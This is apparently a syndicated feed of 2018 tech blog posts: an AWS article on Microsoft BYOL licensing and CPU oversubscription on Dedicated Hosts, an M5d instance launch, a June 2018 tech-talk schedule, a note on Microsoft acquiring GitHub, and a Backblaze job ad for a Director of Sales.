An EC2 Dedicated Host is a dedicated server of a specific Instance Class that is allotted to a single customer, referred to as dedicated tenancy. The density of a host is based on the Instance Size as well as the Instance Type defined at creation. If you chose the M5 Instance Type and chose the m5.large Instance Size, you would have 48 “slots” available on the host to deploy m5.large Instances. If you chose the m5.xlarge, you would have enough capacity to house 24 Instances. Dedicated hosts have a fixed number of vCPU and RAM per Instance Type. To deploy Windows on a Dedicated Host, the customer imports an image (vmdk, ova, vhd) using the import-image utility and tags the image as a “BYOL” in the command. The BYOL flag dictates whether the image will acquire a license from AWS or the customer’s existing licensing framework. When dealing with an oversubscribed customer environment, such as an on-premise VMware deployment, the customer has likely oversubscribed the environment with minimum of 4 vCPU to 1 physical core (4:1). In these environments, Microsoft licensing typically takes place at the host level using physical cores rather than the resources in a provisioned instance (vCPU). An AWS Dedicated Host is oversubscribed 2 vCPU to 1 CPU, meaning each core is Hyper-Threaded. While the math can be performed to show the actual value of a vCPU, customers can be reluctant to modify vCPU configurations to reflect the greater value of the AWS vCPU. Simply matching the quantity of vCPU’s to their current environment may be much more costly and expansive than rightsizing the instances for cost optimization.

Below is a sample configuration of a customer interested in migrating to AWS and utilizing BYOL for Microsoft Windows and SQL Server Enterprise Edition. By licensing the 400 physical cores in their cluster, the customer is able to assign any number of vCPU’s to the VM’s deployed on the hosts. Enterprise Architects have spent a considerable amount of time sizing VM’s with the proper resource attributes, so it can be difficult to initiate that process all over again to bring them to the public cloud.

Customer Environment (SQL Server Enterprise Cluster on VMware):

ESXi Nodes in Cluster 10
Cores/Host (2.6GHz) 40
Total Cores in Cluster 400
vCPU assigned (240/host) 2400
Virtual Machines 470
Oversubscription 5:1
Value of vCPU 520 MHz

In this case, the customer has decided not to right-size their VM’s and instead maintain their current vCPU/RAM specifications. This is a Dedicated Host solution to match their vCPU configurations.

AWS Dedicated Host Environment (Dedicated Hosts required to match vCPU of VMware above)

Dedicated Hosts (r4) 38
Cores/Host (2.6GHz) 36
vCPU/Host 64
Total vCPU assigned 2432
Oversubscription 2:1
Value of vCPU 1300 MHz

If the customer is not willing to consider right-sizing their VM’s by assigning fewer, yet higher powered vCPU’s, they face a considerably larger server deployment. After doing the math, we can determine that the Dedicated Host solution has 2.5 times the power of the VMware solution. Following that logic, and math, right-sizing the VM’s would drop the required vCPU count down to 960 vCPU to match their current solution. This would change the number of required r4 Dedicated Hosts from 38 to 15 hosts and slash the SQL licensing requirements for the solution.

EC2 Bare Metal instances and VMware Cloud on AWS

AWS does have other products that lend to the BYOL/oversubscription story. EC2 Bare Metal instances and VMware Cloud on AWS gives the customer full control of the configuration of instances just as they have on-premise. The EC2 Bare Metal instances are built on the Nitro System which is a collection of AWS-built hardware offload and security components that offers high performance networking and storage to EC2 instances. EC2 Bare Metal instances can utilize AWS services such as Amazon Virtual Private Cloud (VPC), Elastic Block Store (EBS), Elastic Load Balancing (ELB), AutoScaling and more. The Nitro configuration gives the customer the ability to install a server Operating System or hypervisor directly on the hardware. By utilizing their own hypervisor, the customer can define and configure their own instance configurations of RAM, disk and vCPU. By surpassing the fixed configurations in the EC2 Dedicated Host environment, Nitro configurations enable migrating highly oversubscribed on-premise workloads.

The VMware Cloud on AWS offering provides organizations the ability to extend and migrate their on-premise vSphere environment to AWS’s scalable and secure Cloud infrastructure. Customers can leverage vSphere, vSAN, NSX and vCenter technologies to extend their data centers and consume AWS services. vMotion provides the ability to live migrate VM’s to AWS with limited or no downtime. While licensing for migrated VM’s does not change at the VM level, it is imperative that the licensing on the new vSphere node be adequate. Since the customer has complete control of the environment, they have the ability to oversubscribe CPU’s to any ratio. By licensing applications such as SQL Server at the host level, oversubscription rates are irrelevant to licensing. If a vSphere node has 40 cores, as long as the 40 cores are licensed, the number of vCPU’s assigned is immaterial. In the VMware environment, all OS’s and applications are BYOL and no licensing will be provided by AWS. Ultimately, this solution is free of the oversubscription burden that affects certain AWS dedicated tenancy options.

Optimize CPU

EC2 Instance Types offer multiple fixed vCPU to memory configurations to match the customer’s workloads and use cases. With Optimize CPU, customers now have the ability to specify the number of cores that an instance has access to as well as determining if Hyper-Threading is enabled. Hyper-Threading Technology enables multiple threads to run concurrently on a single Intel Xeon CPU core. Each thread is represented as a virtual CPU (vCPU) on the instance. Controlling the threads and core count is significant for Microsoft SQL Server as it is typically more RAM constrained than compute bound. With Optimize CPUs, you can potentially reduce the number of SQL Server licenses required by specifying a custom number of vCPUs. SQL Server on Amazon EC2 is often licensed per virtual core. EC2 vCPU’s are the equivalent of virtual cores. When licensing with virtual cores on EC2, the number of active vCPUs provisioned through Optimize CPUs may indicate the number of SQL Server licenses required. For example, if you have a SQL Standard build that needs the RAM and network capabilities of an r4.4xlarge but not the 16 vCPUs that comes configured on it, you can define the Optimize CPU options in the CLI or API at launch to disable Hyper-Threading and limit the instance to 1, 2, 3, 4, 5, 6, 7 or 8 cores. This example would cut the licensing costs exponentially. The Optimize CPU feature is available for new instance launches in all AWS public regions. To benefit from Optimize CPUs, you can bring SQL Server licenses to Amazon EC2 and use it on EC2 default tenancy or on allocated instances on a EC2 Dedicated Host or a EC2 Dedicated Instance. For a list of supported instance types, and valid CPU counts, see instance type documentation.

In this post, we’ve covered three AWS scenarios and how they fulfill specific areas of BYOL with CPU oversubscription scenario as well as how Optimize CPU can help cut licensing costs. EC2 Dedicated hosts are generally the first choice in the Microsoft BYOL realm unless the customer is absolutely unwilling to right-size their highly oversubscribed instances. EC2 Bare Metal instances provide the customer the ability to configure all aspects of their hypervisor of choice and maintain any oversubscription that exists in their environment. This is a very popular choice that requires little change and ultimately gets their workloads to the AWS Cloud. The VMware Cloud on AWS option is sold by and provisioned by VMware. For users that are current VMware customers, this service allows them to bridge the gap between their on-premise data center and AWS while providing a seamless migration path to the Cloud using their current toolsets.

EC2 Instance Update – M5 Instances with Local NVMe Storage (M5d)

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/ec2-instance-update-m5-instances-with-local-nvme-storage-m5d/

Earlier this month we launched the C5 Instances with Local NVMe Storage and I told you that we would be doing the same for additional instance types in the near future!

Today we are introducing M5 instances equipped with local NVMe storage. Available for immediate use in 5 regions, these instances are a great fit for workloads that require a balance of compute and memory resources. Here are the specs:

Instance Name vCPUs RAM Local Storage EBS-Optimized Bandwidth Network Bandwidth
m5d.large 2 8 GiB 1 x 75 GB NVMe SSD Up to 2.120 Gbps Up to 10 Gbps
m5d.xlarge 4 16 GiB 1 x 150 GB NVMe SSD Up to 2.120 Gbps Up to 10 Gbps
m5d.2xlarge 8 32 GiB 1 x 300 GB NVMe SSD Up to 2.120 Gbps Up to 10 Gbps
m5d.4xlarge 16 64 GiB 1 x 600 GB NVMe SSD 2.210 Gbps Up to 10 Gbps
m5d.12xlarge 48 192 GiB 2 x 900 GB NVMe SSD 5.0 Gbps 10 Gbps
m5d.24xlarge 96 384 GiB 4 x 900 GB NVMe SSD 10.0 Gbps 25 Gbps

The M5d instances are powered by Custom Intel® Xeon® Platinum 8175M series processors running at 2.5 GHz, including support for AVX-512.

You can use any AMI that includes drivers for the Elastic Network Adapter (ENA) and NVMe; this includes the latest Amazon Linux, Microsoft Windows (Server 2008 R2, Server 2012, Server 2012 R2 and Server 2016), Ubuntu, RHEL, SUSE, and CentOS AMIs.

Here are a couple of things to keep in mind about the local NVMe storage on the M5d instances:

Naming – You don’t have to specify a block device mapping in your AMI or during the instance launch; the local storage will show up as one or more devices (/dev/nvme*1 on Linux) after the guest operating system has booted.

Encryption – Each local NVMe device is hardware encrypted using the XTS-AES-256 block cipher and a unique key. Each key is destroyed when the instance is stopped or terminated.

Lifetime – Local NVMe devices have the same lifetime as the instance they are attached to, and do not stick around after the instance has been stopped or terminated.

Available Now
M5d instances are available in On-Demand, Reserved Instance, and Spot form in the US East (N. Virginia), US West (Oregon), EU (Ireland), US East (Ohio), and Canada (Central) Regions. Prices vary by Region, and are just a bit higher than for the equivalent M5 instances.

Jeff;

 

AWS Online Tech Talks – June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-june-2018/

AWS Online Tech Talks – June 2018

Join us this month to learn about AWS services and solutions. New this month, we have a fireside chat with the GM of Amazon WorkSpaces and our 2nd episode of the “How to re:Invent” series. We’ll also cover best practices, deep dives, use cases and more! Join us and register today!

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

 

Analytics & Big Data

June 18, 2018 | 11:00 AM – 11:45 AM PTGet Started with Real-Time Streaming Data in Under 5 Minutes – Learn how to use Amazon Kinesis to capture, store, and analyze streaming data in real-time including IoT device data, VPC flow logs, and clickstream data.
June 20, 2018 | 11:00 AM – 11:45 AM PT – Insights For Everyone – Deploying Data across your Organization – Learn how to deploy data at scale using AWS Analytics and QuickSight’s new reader role and usage based pricing.

 

AWS re:Invent
June 13, 2018 | 05:00 PM – 05:30 PM PTEpisode 2: AWS re:Invent Breakout Content Secret Sauce – Hear from one of our own AWS content experts as we dive deep into the re:Invent content strategy and how we maintain a high bar.
Compute

June 25, 2018 | 01:00 PM – 01:45 PM PTAccelerating Containerized Workloads with Amazon EC2 Spot Instances – Learn how to efficiently deploy containerized workloads and easily manage clusters at any scale at a fraction of the cost with Spot Instances.

June 26, 2018 | 01:00 PM – 01:45 PM PTEnsuring Your Windows Server Workloads Are Well-Architected – Get the benefits, best practices and tools on running your Microsoft Workloads on AWS leveraging a well-architected approach.

 

Containers
June 25, 2018 | 09:00 AM – 09:45 AM PTRunning Kubernetes on AWS – Learn about the basics of running Kubernetes on AWS including how setup masters, networking, security, and add auto-scaling to your cluster.

 

Databases

June 18, 2018 | 01:00 PM – 01:45 PM PTOracle to Amazon Aurora Migration, Step by Step – Learn how to migrate your Oracle database to Amazon Aurora.
DevOps

June 20, 2018 | 09:00 AM – 09:45 AM PTSet Up a CI/CD Pipeline for Deploying Containers Using the AWS Developer Tools – Learn how to set up a CI/CD pipeline for deploying containers using the AWS Developer Tools.

 

Enterprise & Hybrid
June 18, 2018 | 09:00 AM – 09:45 AM PTDe-risking Enterprise Migration with AWS Managed Services – Learn how enterprise customers are de-risking cloud adoption with AWS Managed Services.

June 19, 2018 | 11:00 AM – 11:45 AM PTLaunch AWS Faster using Automated Landing Zones – Learn how the AWS Landing Zone can automate the set up of best practice baselines when setting up new

 

AWS Environments

June 21, 2018 | 11:00 AM – 11:45 AM PTLeading Your Team Through a Cloud Transformation – Learn how you can help lead your organization through a cloud transformation.

June 21, 2018 | 01:00 PM – 01:45 PM PTEnabling New Retail Customer Experiences with Big Data – Learn how AWS can help retailers realize actual value from their big data and deliver on differentiated retail customer experiences.

June 28, 2018 | 01:00 PM – 01:45 PM PTFireside Chat: End User Collaboration on AWS – Learn how End User Compute services can help you deliver access to desktops and applications anywhere, anytime, using any device.
IoT

June 27, 2018 | 11:00 AM – 11:45 AM PTAWS IoT in the Connected Home – Learn how to use AWS IoT to build innovative Connected Home products.

 

Machine Learning

June 19, 2018 | 09:00 AM – 09:45 AM PTIntegrating Amazon SageMaker into your Enterprise – Learn how to integrate Amazon SageMaker and other AWS Services within an Enterprise environment.

June 21, 2018 | 09:00 AM – 09:45 AM PTBuilding Text Analytics Applications on AWS using Amazon Comprehend – Learn how you can unlock the value of your unstructured data with NLP-based text analytics.

 

Management Tools

June 20, 2018 | 01:00 PM – 01:45 PM PTOptimizing Application Performance and Costs with Auto Scaling – Learn how selecting the right scaling option can help optimize application performance and costs.

 

Mobile
June 25, 2018 | 11:00 AM – 11:45 AM PTDrive User Engagement with Amazon Pinpoint – Learn how Amazon Pinpoint simplifies and streamlines effective user engagement.

 

Security, Identity & Compliance

June 26, 2018 | 09:00 AM – 09:45 AM PTUnderstanding AWS Secrets Manager – Learn how AWS Secrets Manager helps you rotate and manage access to secrets centrally.
June 28, 2018 | 09:00 AM – 09:45 AM PTUsing Amazon Inspector to Discover Potential Security Issues – See how Amazon Inspector can be used to discover security issues of your instances.

 

Serverless

June 19, 2018 | 01:00 PM – 01:45 PM PTProductionize Serverless Application Building and Deployments with AWS SAM – Learn expert tips and techniques for building and deploying serverless applications at scale with AWS SAM.

 

Storage

June 26, 2018 | 11:00 AM – 11:45 AM PTDeep Dive: Hybrid Cloud Storage with AWS Storage Gateway – Learn how you can reduce your on-premises infrastructure by using the AWS Storage Gateway to connecting your applications to the scalable and reliable AWS storage services.
June 27, 2018 | 01:00 PM – 01:45 PM PTChanging the Game: Extending Compute Capabilities to the Edge – Discover how to change the game for IIoT and edge analytics applications with AWS Snowball Edge plus enhanced Compute instances.
June 28, 2018 | 11:00 AM – 11:45 AM PTBig Data and Analytics Workloads on Amazon EFS – Get best practices and deployment advice for running big data and analytics workloads on Amazon EFS.

Microsoft acquires GitHub

Post Syndicated from corbet original https://lwn.net/Articles/756443/rss

Here’s the
press release
announcing Microsoft’s agreement to acquire GitHub for a
mere $7.5 billion. “GitHub will retain its developer-first
ethos and will operate independently to provide an open platform for all
developers in all industries. Developers will continue to be able to use
the programming languages, tools and operating systems of their choice for
their projects — and will still be able to deploy their code to any
operating system, any cloud and any device.

Hiring a Director of Sales

Post Syndicated from Yev original https://www.backblaze.com/blog/hiring-a-director-of-sales/

Backblaze is hiring a Director of Sales. This is a critical role for Backblaze as we continue to grow the team. We need a strong leader who has experience in scaling a sales team and who has an excellent track record for exceeding goals by selling Software as a Service (SaaS) solutions. In addition, this leader will need to be highly motivated, as well as able to create and develop a highly-motivated, success oriented sales team that has fun and enjoys what they do.

The History of Backblaze from our CEO
In 2007, after a friend’s computer crash caused her some suffering, we realized that with every photo, video, song, and document going digital, everyone would eventually lose all of their information. Five of us quit our jobs to start a company with the goal of making it easy for people to back up their data.

Like many startups, for a while we worked out of a co-founder’s one-bedroom apartment. Unlike most startups, we made an explicit agreement not to raise funding during the first year. We would then touch base every six months and decide whether to raise or not. We wanted to focus on building the company and the product, not on pitching and slide decks. And critically, we wanted to build a culture that understood money comes from customers, not the magical VC giving tree. Over the course of 5 years we built a profitable, multi-million dollar revenue business — and only then did we raise a VC round.

Fast forward 10 years later and our world looks quite different. You’ll have some fantastic assets to work with:

  • A brand millions recognize for openness, ease-of-use, and affordability.
  • A computer backup service that stores over 500 petabytes of data, has recovered over 30 billion files for hundreds of thousands of paying customers — most of whom self-identify as being the people that find and recommend technology products to their friends.
  • Our B2 service that provides the lowest cost cloud storage on the planet at 1/4th the price Amazon, Google or Microsoft charges. While being a newer product on the market, it already has over 100,000 IT and developers signed up as well as an ecosystem building up around it.
  • A growing, profitable and cash-flow positive company.
  • And last, but most definitely not least: a great sales team.

You might be saying, “sounds like you’ve got this under control — why do you need me?” Don’t be misled. We need you. Here’s why:

  • We have a great team, but we are in the process of expanding and we need to develop a structure that will easily scale and provide the most success to drive revenue.
  • We just launched our outbound sales efforts and we need someone to help develop that into a fully successful program that’s building a strong pipeline and closing business.
  • We need someone to work with the marketing department and figure out how to generate more inbound opportunities that the sales team can follow up on and close.
  • We need someone who will work closely in developing the skills of our current sales team and build a path for career growth and advancement.
  • We want someone to manage our Customer Success program.

So that’s a bit about us. What are we looking for in you?

Experience: As a sales leader, you will strategically build and drive the territory’s sales pipeline by assembling and leading a skilled team of sales professionals. This leader should be familiar with generating, developing and closing software subscription (SaaS) opportunities. We are looking for a self-starter who can manage a team and make an immediate impact of selling our Backup and Cloud Storage solutions. In this role, the sales leader will work closely with the VP of Sales, marketing staff, and service staff to develop and implement specific strategic plans to achieve and exceed revenue targets, including new business acquisition as well as build out our customer success program.

Leadership: We have an experienced team who’s brought us to where we are today. You need to have the people and management skills to get them excited about working with you. You need to be a strong leader and compassionate about developing and supporting your team.

Data driven and creative: The data has to show something makes sense before we scale it up. However, without creativity, it’s easy to say “the data shows it’s impossible” or to find a local maximum. Whether it’s deciding how to scale the team, figuring out what our outbound sales efforts should look like or putting a plan in place to develop the team for career growth, we’ve seen a bit of creativity get us places a few extra dollars couldn’t.

Jive with our culture: Strong leaders affect culture and the person we hire for this role may well shape, not only fit into, ours. But to shape the culture you have to be accepted by the organism, which means a certain set of shared values. We default to openness with our team, our customers, and everyone if possible. We love initiative — without arrogance or dictatorship. We work to create a place people enjoy showing up to work. That doesn’t mean ping pong tables and foosball (though we do try to have perks & fun), but it means people are friendly, non-political, working to build a good service but also a good place to work.

Do the work: Ideas and strategy are critical, but good execution makes them happen. We’re looking for someone who can help the team execute both from the perspective of being capable of guiding and organizing, but also someone who is hands-on themselves.

Additional Responsibilities needed for this role:

  • Recruit, coach, mentor, manage and lead a team of sales professionals to achieve yearly sales targets. This includes closing new business and expanding upon existing clientele.
  • Expand the customer success program to provide the best customer experience possible resulting in upsell opportunities and a high retention rate.
  • Develop effective sales strategies and deliver compelling product demonstrations and sales pitches.
  • Acquire and develop the appropriate sales tools to make the team efficient in their daily work flow.
  • Apply a thorough understanding of the marketplace, industry trends, funding developments, and products to all management activities and strategic sales decisions.
  • Ensure that sales department operations function smoothly, with the goal of facilitating sales and/or closings; operational responsibilities include accurate pipeline reporting and sales forecasts.
  • This position will report directly to the VP of Sales and will be staffed in our headquarters in San Mateo, CA.

Requirements:

  • 7 – 10+ years of successful sales leadership experience as measured by sales performance against goals.
    Experience in developing skill sets and providing career growth and opportunities through advancement of team members.
  • Background in selling SaaS technologies with a strong track record of success.
  • Strong presentation and communication skills.
  • Must be able to travel occasionally nationwide.
  • BA/BS degree required

Think you want to join us on this adventure?
Send an email to jobscontact@backblaze.com with the subject “Director of Sales.” (Recruiters and agencies, please don’t email us.) Include a resume and answer these two questions:

  1. How would you approach evaluating the current sales team and what is your process for developing a growth strategy to scale the team?
  2. What are the goals you would set for yourself in the 3 month and 1-year timeframes?

Thank you for taking the time to read this and I hope that this sounds like the opportunity for which you’ve been waiting.

Backblaze is an Equal Opportunity Employer.

The post Hiring a Director of Sales appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.